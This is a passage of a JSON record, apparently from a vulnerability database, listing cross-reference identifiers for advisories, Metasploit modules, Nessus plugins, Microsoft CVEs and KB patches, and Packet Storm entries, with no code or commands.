"KITPLOIT:6049290411707454748", "KITPLOIT:6411625084720414057", "KITPLOIT:648469287269586263", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:866017936175971203", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2020-0380", "MGASA-2021-0056", "MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2023-0141"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-LINUX-HTTP-SONICWALL_CVE_2021_20039-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "MSF:EXPLOIT-LINUX-LOCAL-SUDO_BARON_SAMEDIT-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2DF3FD324C56807B3618640F5C3492C7", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:A086D121065A6253A8EECABD51EB16DF", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F36351D1B5A5C40989F46EF8729039A7", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2020-0688", "MS:CVE-2020-1472", "MS:CVE-2021-1675", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523", "MS:CVE-2021-34527", "MS:CVE-2021-40444", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB2553204", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4014793", "KB4536987", "KB4536988", "KB4536989", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5000978", "KB5001779", "KB5003435", "KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:11EE27B79C8FC8176F733C5748E02C96", "MSRC:138C696A39E258DD773C8941F8F90E86", "MSRC:236F052536DCDE6A90F408B759E221BC", "MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "MSRC:6EA997A78BB548DC0178952394874CE2", "MSRC:7A4C48432D99E285A3DCFB40C66B7041", "MSRC:8DDE6C6C2CBC080233B7C0F929E83062", "MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:90189138D61770FDBFA4D6BFCF043C7F", "MSRC:93A361B73FFA3EEFB6825C56F25103BB", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "MSRC:C6213215CC0BE4847F142F730607AFA2", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:D3EB0B723121A9028F60C06787605F29", "MSRC:D7503EE6392B6B3DC42482FC0340DB67", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2DF3FD324C56807B3618640F5C3492C7", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:A086D121065A6253A8EECABD51EB16DF", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:A60AFC5A5E991E303E0397289A086789", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201889900", "MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["ACCELLION_FTA_9_12_380.NASL", "AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1590.NASL", "AL2_ALAS-2021-1649.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1739.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1469.NASL", "ALA_ALAS-2021-1478.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2021-0218.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CENTOS8_RHSA-2021-0218.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CENTOS_RHSA-2021-0221.NASL", "CHECKBOX_SURVEY_CVE-2021-27852.NASL", "CISCO-SA-20180328-SMI2-IOS.NASL", "CISCO-SA-20180328-SMI2-IOSXE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2463.NASL", "DEBIAN_DLA-2534.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-4839.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1173.NASL", "EULEROS_SA-2021-1257.NASL", "EULEROS_SA-2021-1276.NASL", "EULEROS_SA-2021-1366.NASL", "EULEROS_SA-2021-1375.NASL", "EULEROS_SA-2021-1390.NASL", "EULEROS_SA-2021-1424.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1520.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1575.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1630.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-1669.NASL", "EULEROS_SA-2021-1707.NASL", "EULEROS_SA-2021-2168.NASL", "EULEROS_SA-2021-2170.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FEDORA_2021-2CB63D912A.NASL", "FEDORA_2021-8840CBDCCD.NASL", "FORGEROCK_OPENAM_7_0.NASL", "FORTIGATE_FG-IR-22-398.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_F3CF4B33601311EB9A0E206A8A720317.NASL", "GENTOO_GLSA-202012-24.NASL", "GENTOO_GLSA-202101-33.NASL", "GENTOO_GLSA-202209-02.NASL", "LINUX_CVE-2021-3156.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "MACOS_HT212177.NASL", "MACOS_SPLUNK_824.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", "MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MS17-010.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0001_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0032_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0089_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0101_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0120_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0178_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2022-0028_SUDO.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "NUTANIX_NXSA-AHV-20201105_1045.NASL", "NUTANIX_NXSA-AOS-5_15_5.NASL", "NUTANIX_NXSA-AOS-5_15_6.NASL", "NUTANIX_NXSA-AOS-5_19_1.NASL", "NUTANIX_NXSA-AOS-5_19_1_5.NASL", "NUTANIX_NXSA-AOS-5_19_2.NASL", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENAM_CVE-2021-35464.NBIN", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-169.NASL", "OPENSUSE-2021-170.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2021-602.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-0218.NASL", "ORACLELINUX_ELSA-2021-0221.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2021-9019.NASL", "ORACLELINUX_ELSA-2021-9169.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLEVM_OVMSA-2021-0003.NASL", "ORACLEVM_OVMSA-2021-0012.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "PHOTONOS_PHSA-2021-1_0-0358_SUDO.NASL", "PHOTONOS_PHSA-2021-2_0-0315_SUDO.NASL", "PHOTONOS_PHSA-2021-3_0-0188_SUDO.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE-SA44784.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "QNAP_QTS_QUTS_HERO_QSA-21-05.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-0218.NASL", "REDHAT-RHSA-2021-0219.NASL", "REDHAT-RHSA-2021-0220.NASL", "REDHAT-RHSA-2021-0221.NASL", "REDHAT-RHSA-2021-0222.NASL", "REDHAT-RHSA-2021-0223.NASL", "REDHAT-RHSA-2021-0224.NASL", "REDHAT-RHSA-2021-0225.NASL", "REDHAT-RHSA-2021-0226.NASL", "REDHAT-RHSA-2021-0227.NASL", "REDHAT-RHSA-2021-0395.NASL", "REDHAT-RHSA-2021-0401.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SITECORE_XP_SC2021-003-499266.NASL", "SLACKWARE_SSA_2021-026-01.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SL_20210126_SUDO_ON_SL7_X.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS21_DEC_5008212.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAY_EXCHANGE.NASL", "SMB_NT_MS21_NOV_5007215.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SOLR_CVE-2021-44228.NASL", "SONICWALL_SMA_SNWLID-2021-0001.NASL", "SONICWALL_SMA_SNWLID-2021-0026.NASL", "SPLUNK_824.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "SUSE_SU-2021-0225-1.NASL", "SUSE_SU-2021-0226-1.NASL", "SUSE_SU-2021-0227-1.NASL", "SUSE_SU-2021-0232-1.NASL", "SUSE_SU-2021-0928-1.NASL", "SUSE_SU-2021-1267-1.NASL", "SUSE_SU-2021-1273-1.NASL", "SUSE_SU-2021-1274-1.NASL", "SUSE_SU-2021-1275-1.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "UBUNTU_USN-4705-1.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_CVE-2021-21985.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "VMWARE_VCENTER_VMSA-2021-0010.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUAPR2023", "ORACLE:CPUJAN2022", "ORACLE:CPUJAN2023", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2023", "ORACLE:CPUOCT2021", "ORACLE:CPUOCT2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-0218", "ELSA-2021-0221", "ELSA-2021-1647", "ELSA-2021-9019", "ELSA-2021-9169"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1", "OSV:DLA-2842-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:143164", "PACKETSTORM:145226", "PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:154176", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056", "PACKETSTORM:159653", "PACKETSTORM:160127", "PACKETSTORM:161160", "PACKETSTORM:161230", "PACKETSTORM:161270", "PACKETSTORM:161293", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163268", "PACKETSTORM:163486", "PACKETSTORM:163487", "PACKETSTORM:163525", "PACKETSTORM:163895", 